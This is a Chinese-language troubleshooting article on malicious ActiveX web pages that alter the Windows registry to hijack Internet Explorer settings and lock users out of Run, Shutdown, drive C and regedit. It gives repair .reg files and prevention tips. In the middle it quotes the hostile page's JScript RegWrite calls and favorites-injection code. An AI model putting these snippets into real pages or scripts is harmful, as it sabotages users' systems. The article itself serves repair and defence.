解決網頁被黑

解決網頁被黑- -
.......惡意網頁修改註冊表的12種現象
網頁被黑一般就是惡意修改註冊表，那我們只有把註冊表改回來了。
一、註冊表被修改的原因及解決辦法
　　其實，該惡意網頁是含有有害代碼的ActiveX網頁檔，這些廣告資訊的出現是因為流覽者的註冊表被惡意更改的結果。
　　1、IE默認連接首頁被修改
　　IE流覽器上方的標題欄被改成“歡迎訪問……網站”的樣式，這是最常見的篡改手段，受害者眾多。
　　受到更改的註冊表專案為：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
　　通過修改“Start Page”的鍵值，來達到修改流覽者IE默認連接首頁的目的，如流覽“萬花穀”就會將你的IE默認連接首頁修改為 “http://on888.home.chinaren.com ”，即便是出於給自己的主頁做廣告的目的，也顯得太霸道了一些，這也是這類網頁惹人厭惡的原因。
　　解決辦法：
　　①在Windows啟動後，點擊“開始”→“運行”菜單項，在“打開”欄中鍵入regedit，然後按“確定”鍵；
　　②展開註冊表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
　　下，在右半部分視窗中找到串值“Start Page”雙擊 ，將Start Page的鍵值改為“about:blank”即可；
　　③同理，展開註冊表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
　　在右半部分視窗中找到串值“Start Page”，然後按②中所述方法處理。
　　④退出註冊表編輯器，重新啟動電腦，一切OK了！
　　特殊例子：當IE的起始頁變成了某些網址後，就算你通過選項設置修改好了，重啟以後又會變成他們的網址啦，十分的難纏。其實他們是在你機器里加了一個自運行程式，它會在系統啟動時將你的IE起始頁設成他們的網站。
　　解決辦法：運行註冊表編輯器regedit.exe，然後依次展開
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
　　主鍵，然後將其下的registry.exe子鍵刪除，然後刪除自運行程式c:\Program Files\registry.exe，最後從IE選項中重新設置起始頁就好了。
2、篡改IE的默認頁
　　有些IE被改了起始頁後，即使設置了“使用默認頁”仍然無效，這是因為IE起始頁的默認頁也被篡改啦。具體說來就是以下註冊表項被修改：
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\
Main\Default_Page_URL
　　“Default_Page_URL”這個子鍵的鍵值即起始頁的默認頁。
　　解決辦法：
　　運行註冊表編輯器，然後展開上述子鍵，將“Default_Page_UR”子鍵的鍵值中的那些篡改網站的網址改掉就好了，或者設置為IE的預設值。
　　3、修改IE流覽器缺省主頁，並且鎖定設置項，禁止用戶更改回來。
　　主要是修改了註冊表中IE設置的下面這些鍵值(DWORD值為1時為不可選)：
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]"Settings"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]"Links"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]"SecAddSites"=dword:1
　　解決辦法：
　　將上面這些DWORD值改為“0”即可恢復功能。
　　4、IE的默認首頁灰色按扭不可選
　　這是由於註冊表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值“homepage”的鍵值被修改的緣故。原來的鍵值為“0”，被修改為“1”（即為灰色不可選狀態）。
　　解決辦法：
　　將“homepage”的鍵值改為“0”即可。
　　5、IE標題欄被修改
　　在系統默認狀態下，是由應用程式本身來提供標題欄的資訊，但也允許用戶自行在上述註冊表專案中填加資訊，而一些惡意的網站正是利用了這一點來得逞的：它們將串值Window Title下的鍵值改為其網站名或更多的廣告資訊，從而達到改變流覽者IE標題欄的目的。
　　具體說來受到更改的註冊表專案為：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
　解決辦法：
　　①在Windows啟動後，點擊“開始”→“運行”菜單項，在“打開”欄中鍵入regedit，然後按“確定”鍵；
　　②展開註冊表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
　　下，在右半部分視窗中找到串值“Window Title” ，將該串值刪除即可，或將Window Title的鍵值改為“IE流覽器”等你喜歡的名字；
　　③同理，展開註冊表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
　　然後按②中所述方法處理。
　　④退出註冊表編輯器，重新啟動電腦，運行IE，你會發現困擾你的問題解決了！
6、IE右鍵菜單被修改
　　受到修改的註冊表專案為：
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
　　下被新建了網頁的廣告資訊，並由此在IE右鍵菜單中出現！
　　解決辦法：　打開註冊標編輯器，找到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
　　刪除相關的廣告條文即可，注意不要把下載軟體FlashGet和Netants也刪除掉啊，這兩個可是“正常”的呀，除非你不想在IE的右鍵菜單中見到它們。
　　7、IE默認搜索引擎被修改
　　在IE流覽器的工具欄中有一個搜索引擎的工具按鈕，可以實現網路搜索，被篡改後只要點擊那個搜索工具按鈕就會鏈結到那個篡改網站。出現這種現象的原因是以下註冊表被修改：
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant
　　解決辦法：
　　運行註冊表編輯器，依次展開上述子鍵，將“CustomizeSearch”和“SearchAssistant”的鍵值改為某個搜索引擎的網址即可。
　　8、系統啟動時彈出對話方塊
　　受到更改的註冊表專案為：
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
　　在其下被建立了字串“LegalNoticeCaption”和“LegalNoticeText”，其中 “LegalNoticeCaption”是提示框的標題，“LegalNoticeText”是提示框的文本內容。由於它們的存在，就使得我們每次登陸 到Windwos桌面前都出現一個提示視窗，顯示那些網頁的廣告資訊！你瞧，多討厭啊！
　　解決辦法：　打開註冊表編輯器，找到
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
　　這一個主鍵，然後在右邊視窗中找到“LegalNoticeCaption”和“LegalNoticeText”這兩個字串，刪除這兩個字串就可以解決在登陸時出現提示框的現象了。
　　9、流覽網頁註冊表被禁用
　　這是由於註冊表
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值“DisableRegistryTools”被修改為“1”的緣故，將其鍵值恢復為“0”即可恢復註冊表的使用。
　　解決辦法
　　用記事本程式建立以REG為尾碼名的檔，將下面這些內容複製在其中就可以了：
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableRegistryTools”=dword:00000000
　10、流覽網頁開始菜單被修改
　　這是最“狠”的一種，讓流覽者有生不如死的感覺。流覽後不僅有類似上面所說的那些症狀，還會有以下更悲慘的遭遇：
　　1)禁止“關閉系統”
　　2)禁止“運行”
　　3)禁止“註銷”
　　4)隱藏C盤——你的C盤找不到了！
　　5)禁止使用註冊表編輯器regedit
　　6)禁止使用DOS程式
　　7)使系統無法進入“實模式”
　　8)禁止運行任何程式
原來，該網頁是有人利用Java技術製作的含有有害代碼的ActiveX網頁檔。
注：下面代碼是將你的IE默認連接首頁改為http://www.findfeel.com/
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Start Page", "http://www.findfeel.com/"）;
注：以下是該網頁修改受害者的註冊表項所用的招數
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"）;
注：使受害者系統沒有“運行”項，這樣用戶就不能通過註冊表編輯器來修改該有害網頁對系統註冊表的修改。
流覽網頁註冊表被修改之迷及解決辦法
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoClose", 01, "REG_BINARY"）;
注：使受害者系統沒有“關閉系統”項
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"）;
注：使受害者系統沒有“登出”項
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"）;
注：使受害者系統沒有邏輯驅動器C
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\WinOldApp\\ Disabled","REG_BINARY"）;
注：禁止運行所有的DOS應用程式；
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\ \WinOldApp\\NoRealMode","REG_BINARY"）;
注：使系統不能啟動到“實模式”（傳統的DOS模式）下；
又注：進入該網頁，它還會修改以下的註冊表項，使WINDOWS系統登錄時顯示一個登錄視窗（在MicroSoft網路用戶登錄之前）
Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeCaption", "嗚啦啦..."）;
注：這些代碼會使視窗的標題是“嗚啦啦…”
Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeText", "歡迎你！你這個超級無敵大白癡！《嗚啦啦...》故事開始了，按確定進入悲慘世界"）;
注：上面一行是會在視窗中顯示出來的文字
注：下面兩行代碼修改註冊表，使受害者所有的IE視窗都加上以下的標題：“嗚啦啦…”
Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "嗚啦啦..."）;
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "嗚啦啦..."）;
注：到上面一行為止，完成了對受害者的註冊表的所有修改！
流覽網頁註冊表被修改之迷及解決辦法
流覽網頁註冊表被修改之迷及解決辦法
注：下面代碼用來將其網頁增加到受害者的收藏夾中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder（0）;
loc = WF + "\\Favorites";
if（!FSO.FolderExists（loc））
{
loc = FSO.GetDriveName（WF） + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if（!FSO.FolderExists（loc））
{
return;
}
}

注：下面就是使其網頁加入到你的收藏夾的具體代碼
AddFavLnk（loc, "找到感覺www.findfeel.com", "http://www.findfeel.com"）;
　　由於代碼很簡單，又加了注釋，相信你已經看明白是怎麼回事了。那麼如果不小心進入該網頁，並且已經中招了該怎麼辦呢？別急，下面給你列出了解決的辦法。
受害用戶的修復方法：
　　1：對於Win9x用戶，建議在電腦啟動時按F8鍵，選擇到MS-DOS方式下，使用Scanreg/restore命令來恢復以前備份的、正常的註冊表。
　　2：對於Win2000用戶，把以下內容copy下來，存為unlock.reg檔，選帶命令行的安全模式，用命令regedit unlock.reg導入，如何重啟機器就OK了。
unlock.reg檔內容如下：
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"Disabled"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"NoRealMode"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE流覽器"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE流覽器"
流覽網頁註冊表被修改之迷及解決辦法
預防辦法：
　　1.要避免中招，關鍵是不要輕易去一些自己並不瞭解的站點。
　　2.在IE設置中將ActiveX插件和控制項、Java腳本等全部禁止
　　3.可以通過升級到最新的病毒庫，來預防該類惡意網頁的侵害。
　　4.既然該網頁是通過修改註冊表來破壞我們的系統，那麼我們可以事先把註冊表加鎖：禁止修改註冊表，這樣就可以達到預防的目的。不過，自己要使用註冊表編輯器regedit.exe該怎麼辦呢？因此我們還要在此前事先準備一把“鑰匙”，以便打開這把“鎖”！
　　加鎖方法如下：
　　（1）運行註冊表編輯器regedit.exe；
　　（2）展開註冊表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System下，新建一個名為DisableRegistryTools的DWORD值，並將其值改為“1”，即可禁止使用註冊表編輯器regedit.exe。
　　解鎖方法如下：
　　用記事本編輯一個任意名字的.reg檔，比如unlock.reg，內容如下：
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000
　　存檔。你就有了一把解鎖的鑰匙了！如果要使用註冊表編輯器，則雙擊unlock.reg即可。要注意的是，在“REGEDIT4”後面一定要空一行，並且“REGEDIT4”中的“4”和“T”之間一定不能有空格，否則將前功盡棄！
說明：對於“萬花穀”網頁的惡意代碼帶來的破壞，也可按上面所提的方法來預防，中招後也可參考上面的方法解決。另，KV3000對“萬花谷”可完全恢復，對本文介紹的網頁破壞系統現象，則無法安全恢復。
11、IE中滑鼠右鍵失效
　　流覽網頁後在IE中滑鼠右鍵失效，點擊右鍵沒有任何反應！
　　12、查看““原始檔案”菜單被禁用
　　在IE視窗中點擊“查看”→“原始檔案”，發現“原始檔案”菜單已經被禁用。
　　我在流覽網頁時並沒有注意到上面這兩個問題，因為當時正好朋友叫我有事，於是我就退出電腦了，晚上吃完飯開啟電腦連線上網，就發現IE中滑鼠右鍵失效，“查看”功能表中的“原始檔案”被禁用。不能查看原始檔案也就罷了，但是無法使用滑鼠右鍵真是太不方便了。得想個辦法！
　　找出最新版的超級兔子魔法設置試試吧，呀！不能解決！看來是個新問題，不過自己好歹也是“老革命”了，這點問題應該難不住我。於是到註冊表中一番搜尋，經過一番查找終於弄明白了問題的所在。
　　原來，惡意網頁修改了我的註冊表，具體的位置為：
　　在註冊表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
　　下建立子鍵“Restrictions”，然後在“Restrictions”下面建立兩個DWORD值：“NoViewSource”和“NoBrowserContextMenu”，並為這兩個DWORD值賦值為“1”。
　　在註冊表
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
　　下，將兩個DWORD值：“NoViewSource”和“NoBrowserContextMenu”的鍵值都改為了“1”。
　　通過上面這些鍵值的修改就達到了在IE中使滑鼠右鍵失效，使“查看”功能表中的“原始檔案”被禁用的目的。要向你說明的是第2點中提到的註冊表其實相當於第1點中提到的註冊表的分支，修改第1點中所說的註冊表鍵值，第2點中註冊表鍵值隨之改變。
　　解決辦法：
　　明白了道理，問題解決起來就容易多了，具體解決辦法為：將以下內容另存為尾碼名為reg的註冊表檔，比方說unlock.reg，雙擊unlock.reg導入註冊表，不用重啟電腦，重新運行IE就會發現IE的功能恢復正常了。
REGEDIT4

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
“NoViewSource”=dword:00000000
"NoBrowserContextMenu"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions]
“NoViewSource”=dword:00000000
“NoBrowserContextMenu”=dword:00000000
　　要特別注意的是，在你編制的註冊表檔unlock.reg中，“REGEDIT4”一定要大寫，並且它的後面一定要空一行，還 有，“REGEDIT4”中的“4”和“T”之間一定不能有空格，否則將前功盡棄！許多朋友寫註冊表檔之所以不成功，就是因為沒有注意到上面所說的內 容，這回該注意點嘍。請注意如果你是Win2000或WinXP用戶，請將“REGEDIT4”改為Windows Registry Editor Version 5.00。